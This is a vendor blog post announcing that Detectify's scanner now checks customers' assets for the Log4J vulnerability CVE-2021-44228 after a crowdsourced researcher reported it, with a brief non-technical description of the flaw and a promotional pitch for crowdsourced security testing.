Critical vulnerability CVE-2021-44228 has set the internet alight over the past few days. Right now, exploit developers and security researchers are still understanding the potential capabilities provided by the vulnerability. Detectify scans for the vulnerability as it was submitted as a zero-day by one of the ethical hackers in our Crowdsource community on Friday. 

In short, the Log4J vulnerability allows an attacker, who can control log messages or log message parameters, to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

Affected customers will be alerted

On Friday morning, Detectify received the zero-day submission for the vulnerability from an ethical hacker in our Crowdsource community, allowing us to deploy a test for the vulnerability in production. This means that if you’re running Detectify’s Application Scanning, we will check for the vulnerability and alert you if it is detected in your assets. Subsequently, our Security Research team has been iterating on the initial test, improving accuracy. 

This is yet another example as to why crowdsourcing security research proves to be the most effective way of staying on top of the ever changing security landscape. Solely relying on internal security research teams and testing against CVE libraries is a thing of the past. Crowdsourcing vulnerabilities is the quickest way to get vulnerability research from the streets to your hands as we’ve seen in these past few days. 

New tests are added continuously

Our work is not finished and we will continue to give this our full and utmost attention in the coming days. We highly recommend scanning all critical assets via the Application Scan as soon as you can, and continually throughout the next week as new tests are added to our engines continuously.

Please do not hesitate to contact your Customer Success Manager or Support if you have any further questions and we will reply as soon as possible. If you’re not already a customer, click here to sign up for a free trial and immediately start scanning.

Posted by Charlie